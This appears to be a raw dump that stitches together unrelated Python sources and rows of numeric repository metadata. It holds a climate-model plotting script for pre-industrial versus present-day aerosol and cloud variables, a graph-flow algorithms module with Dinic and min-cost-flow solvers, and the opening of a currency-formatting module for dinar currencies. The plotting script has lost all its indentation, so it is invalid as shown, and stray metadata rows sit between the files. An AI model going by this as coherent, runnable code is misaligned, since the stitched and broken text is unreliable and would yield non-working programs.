ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
print(fn)
# %%
var = 'CDNUMC'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=colors.Normalize(vmin=-12, vmax=12)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
var = 'TGCLDLWP'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=colors.Normalize(vmin=-5, vmax=5)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
var = 'N50'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff=colors.Normalize(vmin=-30, vmax=30)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'N100'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=colors.Normalize(vmin=-50, vmax=50)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'N150'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'N200'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=colors.Normalize(vmin=-13, vmax=+13)
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'N250'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
norm_diff=colors.Normalize(vmin=-13, vmax=+13)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'AWNC_incld'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
print(fn)
plt.show()
# %%
var = 'ACTNL_incld'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
# %%
print(fn)
# %%
var = 'SIGMA01'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
# , 'ACTNL_incld', 'ACTREL_incld'],
# norm_abs=norm_abs,
# norm_dic=norm_dic
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'}
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NMR01'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
# , 'ACTNL_incld', 'ACTREL_incld'],
# norm_abs=norm_abs,
# norm_dic=norm_dic
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'}
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NCONC08'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NMR08'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NMR09'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NCONC09'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'N_AER'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
| 37.416043
| 108
| 0.47759
| 3,840
| 34,984
| 4.049479
| 0.071875
| 0.02836
| 0.059871
| 0.038714
| 0.836141
| 0.82283
| 0.804309
| 0.802444
| 0.797299
| 0.791897
| 0
| 0.0277
| 0.406643
| 34,984
| 934
| 109
| 37.456103
| 0.721409
| 0.053367
| 0
| 0.783019
| 0
| 0
| 0.085008
| 0.024708
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001348
| 0.01752
| 0
| 0.01752
| 0.013477
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70f7c69c928952fcc252d0b5958c8ab7d8a3fdf7
| 13,593
|
py
|
Python
|
flow.py
|
nohtaray/competitive-programming
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | 1
|
2021-02-08T07:15:17.000Z
|
2021-02-08T07:15:17.000Z
|
flow.py
|
nohtaray/competitive-programming.py
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | null | null | null |
flow.py
|
nohtaray/competitive-programming.py
|
ac5002fedbb6f27b515a10898936f52180715269
|
[
"CC0-1.0"
] | null | null | null |
import heapq
from collections import defaultdict, deque
class Dinic:
def __init__(self, graph=None, residual=None):
"""
:param list of (list of (int, int)) graph: (to, cap) の隣接リスト
:param list of (list of (list of (int|list))) residual: (to, cap, rev) の残余グラフ
"""
assert (graph and not residual) or (not graph and residual)
if graph:
self.graph = self.residual_graph(graph)
else:
self.graph = residual
@staticmethod
def residual_graph(graph):
"""
残余グラフ構築
:param list of (list of (int, int)) graph: (to, cap) の隣接リスト
:rtype: list of (list of (list of (int|list)))
:return: (to, cap, rev) の残余グラフ
"""
ret = [[] for _ in range(len(graph))]
for v in range(len(graph)):
for u, cap in graph[v]:
rev = [v, 0]
edge = [u, cap, rev]
rev.append(edge)
ret[v].append(edge)
ret[u].append(rev)
return ret
def _dist(self, s):
"""
:param int s:
:rtype: list of int
:return: s からの距離。残余グラフ上で到達できない場合は -1
"""
ret = [-1] * len(self.graph)
ret[s] = 0
que = deque([(s, 0)])
while que:
v, d = que.popleft()
for u, cap, _ in self.graph[v]:
if ret[u] < 0 < cap:
ret[u] = d + 1
que.append((u, d + 1))
return ret
def _dfs(self, s, t, dist, iter, flow=float('inf')):
"""
:param int s:
:param int t:
:param list of int dist:
:param list of int iter:
:param int flow:
"""
if s == t:
return flow
while iter[s] < len(self.graph[s]):
edge = self.graph[s][iter[s]]
to, cap, rev = edge
if dist[s] < dist[to] and cap > 0:
f = self._dfs(to, t, dist, iter, min(flow, cap))
if f > 0:
edge[1] -= f
rev[1] += f
return f
iter[s] += 1
return 0
def maximum_flow(self, from_v, to_v):
"""
:param int from_v:
:param int to_v:
:return: from_v から to_v への最大流
"""
ret = 0
while True:
dist = self._dist(from_v)
if dist[to_v] < 0:
break
iter = [0] * len(self.graph)
while True:
flow = self._dfs(from_v, to_v, dist, iter)
if flow == 0:
break
ret += flow
return ret
class DictDinic:
"""
Dinic の頂点を int 以外でもいいようにしたやつ
"""
def __init__(self, graph=None, residual=None):
"""
:param dict[Any, (list of (Any, int))] graph: (to, cap) の隣接リスト
:param dict[Any, (list of list)] residual: (to, cap, rev) の残余グラフ
"""
assert (graph and not residual) or (not graph and residual)
if graph:
self.graph = self.residual_graph(graph)
else:
self.graph = residual
@staticmethod
def residual_graph(graph):
"""
残余グラフ構築
:param dict[Any, (list of (Any, int))] graph: (to, cap) の隣接リスト
:rtype: dict[Any, (list of list)]
:return: (to, cap, rev) の残余グラフ
"""
ret = defaultdict(list)
for v in graph.keys():
for u, cap in graph[v]:
rev = [v, 0]
edge = [u, cap, rev]
rev.append(edge)
ret[v].append(edge)
ret[u].append(rev)
return ret
def _dist(self, s):
"""
:param s:
:rtype: dict[Any, int]
:return: s からの距離。残余グラフ上で到達できない場合は -1
"""
ret = defaultdict(lambda: -1)
ret[s] = 0
que = deque([(s, 0)])
while que:
v, d = que.popleft()
for u, cap, _ in self.graph[v]:
if ret[u] < 0 < cap:
ret[u] = d + 1
que.append((u, d + 1))
return ret
def _dfs(self, s, t, dist, iter, flow=float('inf')):
"""
:param s:
:param t:
:param dict[Any, int] dist:
:param dict[Any, int] iter:
:param int flow:
"""
if s == t:
return flow
while iter[s] < len(self.graph[s]):
edge = self.graph[s][iter[s]]
to, cap, rev = edge
if dist[s] < dist[to] and cap > 0:
f = self._dfs(to, t, dist, iter, min(flow, cap))
if f > 0:
edge[1] -= f
rev[1] += f
return f
iter[s] += 1
return 0
def maximum_flow(self, from_v, to_v):
"""
:param from_v:
:param to_v:
:return: from_v から to_v への最大流
"""
ret = 0
while True:
dist = self._dist(from_v)
if dist[to_v] < 0:
break
iter = defaultdict(int)
while True:
flow = self._dfs(from_v, to_v, dist, iter)
if flow == 0:
break
ret += flow
return ret
class MinCostFlow:
"""
最小費用流 ベルマンフォード版
"""
def __init__(self, graph=None, residual=None):
"""
:param list of (list of (int, int, int)) graph: (to, cap, cost) の隣接リスト
:param list of (list of (list of (int|list))) residual: (to, cap, cost, rev) の残余グラフ
"""
assert (graph and not residual) or (not graph and residual)
if graph:
self.graph = self.residual_graph(graph)
else:
self.graph = residual
@staticmethod
def residual_graph(graph):
"""
残余グラフ構築
:param list of (list of (int, int, int)) graph: (to, cap, cost) の隣接リスト
:rtype: list of (list of (list of (int|list)))
:return: (to, cap, cost, rev) の残余グラフ
"""
ret = [[] for _ in range(len(graph))]
for v in range(len(graph)):
for u, cap, cost in graph[v]:
rev = [v, 0, -cost]
edge = [u, cap, cost, rev]
rev.append(edge)
ret[v].append(edge)
ret[u].append(rev)
return ret
def solve(self, from_v, to_v, flow):
"""
:param int from_v:
:param int to_v:
:param int flow:
:rtype: int
"""
remains = flow
total_cost = 0
while remains > 0:
# 最短路
dist = [float('inf')] * len(self.graph)
preve = [None] * len(self.graph)
prevv = [None] * len(self.graph)
dist[from_v] = 0
stop = False
while not stop:
stop = True
for v, edges in enumerate(self.graph):
for edge in edges:
u, cap, cost, rev = edge
if cap > 0 and dist[v] + cost < dist[u]:
dist[u] = dist[v] + cost
prevv[u] = v
preve[u] = edge
stop = False
flow = remains
if dist[to_v] == float('inf'):
total_cost = -1
break
v = to_v
while v != from_v:
cap = preve[v][1]
v = prevv[v]
flow = min(cap, flow)
# path に沿って flow 流す
cost = 0
v = to_v
while v != from_v:
cost += preve[v][2] * flow
preve[v][1] -= flow
preve[v][3][1] += flow
v = prevv[v]
remains -= flow
total_cost += cost
return total_cost
class DictMinCostFlow:
"""
最小費用流 ベルマンフォード版
MinCostFlow の頂点を int 以外でもいいようにしたやつ。
"""
def __init__(self, graph=None, residual=None):
"""
:param dict[Any, (list of (Any, int, int))] graph: (to, cap, cost) の隣接リスト
:param dict[Any, (list of list)] residual: (to, cap, cost, rev) の残余グラフ
"""
assert (graph and not residual) or (not graph and residual)
if graph:
self.graph = self.residual_graph(graph)
else:
self.graph = residual
@staticmethod
def residual_graph(graph):
"""
残余グラフ構築
:param dict[Any, (list of (Any, int, int))] graph: (to, cap, cost) の隣接リスト
:rtype: dict[Any, (list of list)]
:return: (to, cap, cost, rev) の残余グラフ
"""
ret = defaultdict(list)
for v in graph.keys():
for u, cap, cost in graph[v]:
rev = [v, 0, -cost]
edge = [u, cap, cost, rev]
rev.append(edge)
ret[v].append(edge)
ret[u].append(rev)
return ret
def solve(self, from_v, to_v, flow):
"""
:param from_v:
:param to_v:
:param int flow:
:return:
"""
remains = flow
total_cost = 0
while remains > 0:
# 最短路
dist = defaultdict(lambda: float('inf'))
preve = defaultdict(lambda: None)
prevv = defaultdict(lambda: None)
dist[from_v] = 0
stop = False
while not stop:
stop = True
for v, edges in self.graph.items():
for edge in edges:
u, cap, cost, rev = edge
if cap > 0 and dist[v] + cost < dist[u]:
dist[u] = dist[v] + cost
prevv[u] = v
preve[u] = edge
stop = False
flow = remains
if dist[to_v] == float('inf'):
total_cost = -1
break
v = to_v
while v != from_v:
cap = preve[v][1]
v = prevv[v]
flow = min(cap, flow)
# path に沿って flow 流す
cost = 0
v = to_v
while v != from_v:
cost += preve[v][2] * flow
preve[v][1] -= flow
preve[v][3][1] += flow
v = prevv[v]
remains -= flow
total_cost += cost
return total_cost
class PrimalDual:
"""
最小費用流 ダイクストラ版
"""
def __init__(self, graph=None, residual=None):
"""
:param list of (list of (int, int, int)) graph: (to, cap, cost) の隣接リスト
:param list of (list of (list of (int|list))) residual: (to, cap, cost, rev) の残余グラフ
"""
assert (graph and not residual) or (not graph and residual)
if graph:
self.graph = self.residual_graph(graph)
else:
self.graph = residual
@staticmethod
def residual_graph(graph):
"""
残余グラフ構築
:param list of (list of (int, int, int)) graph: (to, cap, cost) の隣接リスト
:rtype: list of (list of (list of (int|list)))
:return: (to, cap, cost, rev) の残余グラフ
"""
ret = [[] for _ in range(len(graph))]
for v in range(len(graph)):
for u, cap, cost in graph[v]:
rev = [v, 0, -cost]
edge = [u, cap, cost, rev]
rev.append(edge)
ret[v].append(edge)
ret[u].append(rev)
return ret
def solve(self, from_v, to_v, flow):
"""
:param int from_v:
:param int to_v:
:param int flow:
:rtype: int
"""
total_cost = 0
prevv = [-1] * len(self.graph)
preve = [-1] * len(self.graph)
# ポテンシャル
h = [0] * len(self.graph)
remains = flow
while remains > 0:
dist = [float('inf')] * len(self.graph)
dist[from_v] = 0
heap = [(0, from_v)]
# Dijkstra
while heap:
d, v = heapq.heappop(heap)
if d > dist[v]:
continue
for edge in self.graph[v]:
u, cap, cost, rev = edge
if cap > 0 and dist[v] + cost + h[v] - h[u] < dist[u]:
dist[u] = dist[v] + cost + h[v] - h[u]
prevv[u] = v
preve[u] = edge
heapq.heappush(heap, (dist[u], u))
if dist[to_v] == float('inf'):
# これ以上流せない
return -1
for i, d in enumerate(dist):
h[i] += d
# 最短路に流せる量
flow = remains
v = to_v
while v != from_v:
cap = preve[v][1]
flow = min(cap, flow)
v = prevv[v]
# 最短路に flow だけ流す
v = to_v
while v != from_v:
preve[v][1] -= flow
preve[v][3][1] += flow
v = prevv[v]
remains -= flow
total_cost += flow * h[to_v]
return total_cost
def hungarian(mat):
"""
各行・各列から 1 要素ずつ選んでコストが最小となるときの行番号・列番号
ハンガリアン法 O(N^3)
https://en.wikipedia.org/wiki/Hungarian_algorithm
:param list of (list of int) mat:
:rtype: list of int, list of int
"""
import numpy as np
from scipy.optimize import linear_sum_assignment
rows, cols = linear_sum_assignment(np.array(mat, dtype=int))
return list(rows), list(cols)
| 29.358531
| 91
| 0.437578
| 1,623
| 13,593
| 3.595194
| 0.083179
| 0.046272
| 0.039417
| 0.039075
| 0.824165
| 0.822108
| 0.803428
| 0.778406
| 0.774979
| 0.774979
| 0
| 0.009947
| 0.445303
| 13,593
| 462
| 92
| 29.422078
| 0.76366
| 0.18333
| 0
| 0.864583
| 0
| 0
| 0.002353
| 0
| 0
| 0
| 0
| 0
| 0.017361
| 1
| 0.069444
| false
| 0
| 0.013889
| 0
| 0.170139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb7e157f57a6f7d812fdc6acf47472a86c2c8614
| 21,827
|
py
|
Python
|
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | 2
|
2021-03-26T18:19:57.000Z
|
2021-07-27T01:15:50.000Z
|
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
multicurrency/dinar.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Dinar currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class BahrainiDinar(Currency):
"""Bahraini Dinar currency representation.
Simple usage example:
>>> from multicurrency import BahrainiDinar
>>> bahraini_dinar = BahrainiDinar(
... amount=123456.789)
>>> print(bahraini_dinar)
د.ب. ١٢٣٬٤٥٦٫٧٨٩
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = '\u066B',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u066C',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'BahrainiDinar':
"""Class creator.
Returns:
BahrainiDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='BHD',
numeric_code='048',
symbol='د.ب.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ب.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='٠١٢٣٤٥٦٧٨٩-',
international=international)
class AlgerianDinar(Currency):
"""Algerian Dinar currency representation.
Simple usage example:
>>> from multicurrency import AlgerianDinar
>>> algerian_dinar = AlgerianDinar(
... amount=123456.789)
>>> print(algerian_dinar)
123.456,79 د.ج.
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
